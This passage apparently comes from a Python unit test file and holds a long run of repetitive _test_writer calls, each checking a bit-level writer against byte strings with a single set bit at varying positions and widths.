_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 64, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 63, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 62, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 61, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 60, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 59, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 58, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 57, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 56, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 55, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 54, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 53, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 52, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 51, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 50, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 49, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 48, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 47, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 46, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 45, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 44, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 43, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 42, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 41, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 40, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 39, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 38, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 37, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 36, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 35, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 34, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 33, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 64, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 63, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 62, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 61, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 60, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 59, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 58, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 57, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 56, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 55, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 54, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 53, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 52, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 51, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 50, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 49, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 48, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 47, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 46, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 45, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 44, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 43, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 42, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 41, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 40, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 39, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 38, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 37, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 36, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 35, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 34, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 33, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 31, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 30, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 29, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 28, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 27, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 26, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 25, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 24, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 23, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 22, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 21, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 20, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 19, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 18, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 17, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
